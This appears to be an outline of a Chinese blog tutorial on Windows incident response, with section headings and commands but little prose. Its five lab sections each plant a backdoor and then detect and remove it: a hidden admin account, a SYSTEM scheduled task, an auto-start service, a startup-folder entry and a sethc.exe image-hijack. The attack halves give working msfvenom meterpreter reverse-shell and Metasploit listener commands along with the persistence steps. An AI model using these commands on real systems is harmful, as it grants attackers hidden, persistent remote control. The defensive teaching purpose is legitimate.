文章目录
- 🍬 博主介绍
- 1.1 Windows后门应急-1:windows后门账户
- 1.2 Windows后门应急-2:计划任务后门
- 1.3 Windows后门应急-3:windows服务后门
- 1.4 Windows后门应急-4:启动项后门
- 1.5 Windows后门应急-5:shift粘贴键后门
- 相关资源
1.1 Windows后门应急-1:windows后门账户
1.1.1 隐藏账户介绍
1.1.1.1 简介
1.1.1.2 原理
1.1.1.3 实现步骤
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.128 lport=55555 -o malicious.exe
$NewUser = "HiddenUser"
$NewUserPassword = ConvertTo-SecureString "StrongPassword123!" -AsPlainText -Force
New-LocalUser -Name $NewUser -Password $NewUserPassword -AccountNeverExpires -UserMayNotChangePassword -PasswordNeverExpires
Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList' -Name "HiddenUser" -Value 0
Get-LocalUser | Select-Object Name, Enabled
1.1.1.4 防御措施
Get-LocalUser
1.1.2 隐藏账户创建实战
1.1.2.1 前提条件
1.1.2.2 环境介绍
1.1.2.3 创建一个隐藏账号
net user powershell$ w123456! /add
net localgroup administrators powershell$ /add
net user
1.1.2.4 隐藏不彻底
1.1.2.4.1 管理账户查看
1.1.2.4.2 管理工具查看
1.1.2.4.3 注销登录页面查看
1.1.2.5 修改注册表
1.1.2.5.1 首先打开注册表编辑器
regedit
1.1.2.5.2 确保可以看到SAM路径下的文件
1.1.2.5.3 找到用户对应的表
1.1.2.5.4 替换F值
1.1.2.5.5 导出需隐藏用户的表
1.1.2.5.6 删除需要隐藏的用户
net user powershell$ /del
1.1.2.5.7 导入需隐藏用户的表
1.1.2.5.8 隐藏状态
1.1.2.6 登陆界面隐藏账户
regedit
1.1.2.7 用户被完全隐藏
1.1.2.8用户正常登录
1.1.3 隐藏账户应急实战
1.1.3.1 注册表中用户
1.1.3.2 管理账户中用户
1.1.3.3 管理工具中用户
1.1.3.4 删除隐藏账户
1.2 Windows后门应急-2:计划任务后门
1.2.1 计划任务后门介绍
1.2.1.1 简介
1.2.1.2 原理
1.2.1.3 实现步骤
1.2.1.4 防御措施
1.2.2 计划任务后门创建实战
1.2.2.1 前提条件
1.2.2.2 环境介绍
1.2.2.3 利用MSF生成一个EXE类型的后门木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.128 lport=55555 -f exe -o PowerShell.exe
1.2.2.4 MSF 启动监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.0.0.128
set lport 55555
run
1.2.2.5 将创建的后门上传到目标windows机器
python -m http.server 80
1.2.2.6 创建计划任务后门
schtasks /create /tn PowerShell /sc minute /mo 1 /tr C:\PowerShell.exe /ru system /f
schtasks /query /tn "PowerShell" /fo LIST /v
control schedtasks
1.2.2.7 windows10权限丢失
1.2.3 计划任务后门应急实战
1.2.3.1 查看网络连接
netstat -ano
1.2.3.2 分析找到源头
wmic process get name,executablepath,processid|findstr 764
C:\PowerShell.exe PowerShell.exe 420
1.2.3.3 应急处置
C:\PowerShell.exe
taskkill /f /pid 764
1.2.3.4 计划任务分析
control schedtasks
1.2.3.5 删除计划任务
schtasks /delete /tn "PowerShell" /f
1.3 Windows后门应急-3:windows服务后门
1.3.1 windows服务后门介绍
1.3.1.1 简介
1.3.1.2 原理
1.3.1.3 实现步骤
1.3.1.4 防御措施
1.3.2 windows服务后门创建实战
1.3.2.1 前提条件
1.3.2.2 环境介绍
1.3.2.3 利用MSF生成一个EXE类型的后门木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.128 lport=55555 -f exe -o PowerShell.exe
1.3.2.4 MSF 启动监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.0.0.128
set lport 55555
run
1.3.2.5 将创建的后门上传到目标windows机器
python -m http.server 80
1.3.2.6 创建后门自启动服务
sc create "PowerShellserver" binpath= "C:\PowerShell.exe"
sc description "PowerShellserver" "PowerShellserver"
sc config "PowerShellserver" start= auto
net start "PowerShellserver"
1.3.2.7 windows10权限丢失
1.3.3 windows服务后门应急实战
1.3.3.1 查看网络连接
netstat -ano
1.3.3.2 分析找到源头
wmic process get name,executablepath,processid|findstr 6352
C:\PowerShell.exe PowerShell.exe 420
经检测发现C:\PowerShell.exe文件为后门木马
1.3.3.3 应急处置
C:\PowerShell.exe
taskkill /f /pid 420
1.3.3.4 启动项分析
1.3.3.5 完全处置
1.4 Windows后门应急-4:启动项后门
1.4.1 启动项后门介绍
1.4.1.1 简介
1.4.1.2 原理
1.4.1.3 实现步骤
1.4.1.4 防御措施
1.4.1.5 应用场景
1.4.2 启动项后门创建实战
1.4.2.1 启动项后门演示
1.4.2.1.1 前提条件
1.4.2.1.2 环境介绍
1.4.2.1.3 利用MSF生成一个EXE类型的后门木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.128 lport=55555 -f exe -o PowerShell.exe
1.4.2.1.4 MSF 启动监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.0.0.128
set lport 55555
run
1.4.2.1.5 将后门放在 Windows启动项
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup
1.4.2.1.6 重启 windows
1.4.2.1.7 windows10权限丢失
1.4.3 启动项后门后门应急实战
1.4.3.1 查看网络连接
netstat -ano
1.4.3.2 分析找到源头
wmic process get name,executablepath,processid|findstr 7456
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\wxiaoge.exe PowerShell.exe
1.4.3.3 应急处置
c:\programdata\microsoft\windows\start menu\programs\startup\PowerShell.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\PowerShell.exe
taskkill /f /pid 2920
1.4.3.4 注意事项
https://blog.csdn.net/qq_51577576/article/details/130119164
1.5 Windows后门应急-5:shift粘贴键后门
1.5.1 shift粘贴键后门介绍
1.5.1.1 简介
1.5.1.2 原理
1.5.1.3 实现步骤
1.5.1.4 防御措施
1.5.1.5 应用场景
1.5.2 shift粘贴键后门创建实战
1.5.2.1 shift粘贴键演示
1.5.2.2 shift粘贴键演示执行文件位置
C:\Windows\System32\sethc.exe
1.5.2.3 sethc.exe映像劫持创建后门
1.5.2.3.1 简单介绍
1.5.2.3.2 实现步骤
计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
C:\Windows\System32\cmd.exe
1.5.2.3.2 后门创建成功
1.5.3 shift粘贴键后门应急实战
1.5.3.1 上传分析工具
https://blog.csdn.net/qq_51577576/article/details/130119164
1.5.3.2 分析找到源头
HKEY_LOCAL_MACHINE\ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion\Image File ExecutionOption
1.5.3.3 应急处置
1.5.3.4 应急处置成功
相关资源
[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置-1:windows后门账户
[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置-2:计划任务后门
[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置-3:windows服务后门
[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置-4:启动项后门
[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置-5:Shift 粘贴键后门